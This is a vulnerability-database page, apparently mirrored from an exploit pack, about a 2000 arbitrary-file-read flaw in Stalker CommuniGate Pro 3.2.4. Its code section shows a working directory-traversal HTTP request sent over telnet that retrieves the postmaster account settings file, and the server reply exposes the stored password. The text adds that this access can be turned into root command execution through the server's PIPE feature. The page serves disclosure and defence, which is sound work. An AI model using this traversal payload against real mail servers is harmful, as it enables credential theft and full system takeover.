Lucene search

K

Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read

๐Ÿ—“๏ธย 03 Apr 2000ย 00:00:00Reported byย S21SecTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 13ย Views

Vulnerability in Stalker CommuniGate Pro allows arbitrary file reading and potential remote command execution.

Show more
Code
source: https://www.securityfocus.com/bid/1493/info

A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root. 

Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Apr 2000 00:00Current
0.9Low risk
Vulners AI Score0.9
13
.json
Report